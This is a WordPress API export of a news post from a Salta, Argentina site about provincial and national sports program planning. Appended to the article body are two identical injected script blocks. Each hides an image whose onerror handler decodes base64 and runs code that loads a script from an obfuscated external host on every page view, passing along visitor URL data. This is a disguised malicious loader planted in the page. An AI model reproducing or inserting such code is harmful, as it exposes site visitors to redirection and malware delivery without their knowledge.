{"id":1418,"date":"2022-09-04T20:28:45","date_gmt":"2022-09-04T23:28:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1418"},"modified":"2025-08-14T00:36:37","modified_gmt":"2025-08-14T03:36:37","slug":"provincia-y-nacion-avanzaron-en-definiciones-de-programas-deportivos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1418","title":{"rendered":"Provincia y Naci\u00f3n avanzaron en definiciones de programas deportivos"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#694f08\"><em>Se evaluaron los programas deportivos que en Salta se ejecutan con una perspectiva federal.<\/em><\/h3>\n\n\n\n<p>El secretario de Deportes&nbsp;<strong>Sergio<\/strong>&nbsp;<strong>Chib\u00e1n<\/strong>&nbsp;particip\u00f3 junto a sus pares provinciales en una reuni\u00f3n con el ministro de Turismo y Deportes de la Naci\u00f3n&nbsp;<strong>Mat\u00edas<\/strong>&nbsp;<strong>Lammens<\/strong>&nbsp;con el objetivo de avanzar en la planificaci\u00f3n y ejecuci\u00f3n&nbsp; de programas y planes deportivos.<\/p>\n\n\n\n<p>En la reuni\u00f3n se trataron los temas presupuestarios y detalles de los Juegos Evita, Clubes en Obras, Hay Equipo, Unidad de Asistencia, Plan Federal de Infraestructura Deportiva, Polideportivo en Obras y Encuentro Nacional de Clubes.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3985-se-evaluaron-los-programas-deportivos-que-en-salta-se-ejecutan-con-una-perspectiva-federal.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3985-se-evaluaron-los-programas-deportivos-que-en-salta-se-ejecutan-con-una-perspectiva-federal.jpg\" alt=\"Se evaluaron los programas deportivos que en Salta se ejecutan con una perspectiva federal.\" width=\"-125\" height=\"-166\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cSiempre es destacable la predisposici\u00f3n del ministro Lammens que escucha las distintas problem\u00e1ticas que tenemos las provincias y adem\u00e1s nos inform\u00f3 gratamente la suba del presupuesto en los distintos programas nacionales que nos permiten fortalecer el deporte de la provincia\u201d, dijo Chiban<\/p>\n\n\n\n<p>El funcionario agreg\u00f3 que&nbsp;\u201cestamos trabajando fuertemente con una mirada federal tal cual nos encomend\u00f3 nuestro gobernador Gustavo S\u00e1enz para que el deporte en Salta crezca y se fortalezca cada vez m\u00e1s\u2019.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se evaluaron los programas deportivos que en Salta se ejecutan con una perspectiva federal. El secretario de Deportes&nbsp;Sergio&nbsp;Chib\u00e1n&nbsp;particip\u00f3 junto a sus pares provinciales en una reuni\u00f3n con el ministro de Turismo y Deportes de la Naci\u00f3n&nbsp;Mat\u00edas&nbsp;Lammens&nbsp;con el objetivo de avanzar en la planificaci\u00f3n y ejecuci\u00f3n&nbsp; de programas y planes deportivos. En la reuni\u00f3n se trataron [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1419,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21,15],"tags":[],"class_list":{"0":"post-1418","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1418"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1418"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1418\/revisions"}],"predecessor-version":[{"id":7367,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1418\/revisions\/7367"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1419"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1418"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1418"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1418"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}